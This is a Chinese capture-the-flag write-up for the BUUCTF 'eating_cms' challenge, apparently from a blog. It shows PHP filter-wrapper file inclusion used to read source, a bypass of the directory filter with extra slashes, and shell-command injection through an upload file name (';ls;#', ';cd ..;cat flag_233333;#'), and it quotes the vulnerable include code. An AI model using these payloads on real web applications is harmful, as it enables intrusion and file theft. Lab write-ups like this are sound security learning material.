BUU eating_cms

一个可爱的猫猫登陆界面,日常扫目录抓包看代码
在这里插入图片描述
尝试注入被waf了
在这里插入图片描述
发现一个注册后台,老老实实注册
register.php
登进去是个跟猫猫无关好像有一些功能点但是抓包什么也看不出的页面而且似曾相识感觉在哪里见到过。
略加思索
看看url感觉可以进行文件包含
php伪协议指南
先看看当前的页面
/user.php?page=php://filter/convert.base64-encode/resource=user

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

好像没什么有用的东西(页面进行base64解码查看源码),在function.php看看
/user.php?page=php://filter/convert.base64-encode/resource=function

在这里插入图片描述
发现被限制访问了,可以在url中多加几个斜杆绕过,然后依次读取ffffflllllllaaaaaggg和m4aaannngggeee.php

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

给出一个文件上传地址,访问后上传
在这里插入图片描述
上传失败,直接访问upllloadddd.php
在这里插入图片描述
可以看到文件名直接拼接在命令中,那么可以通过文件名来控制指令
问题来了,正确的上传路径是什么呢
找了很久,未果。。。qmq
(看了别人的wp后)
/user.php?page=m4aaannngggeee
处为真正的上传点
抓包,改文件名为
;ls;#;
列出所有目录
在这里插入图片描述
发现没有flag,去上一级看看
;cd …;ls;#
在这里插入图片描述
catflag
;cd …;cat flag_233333;#
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值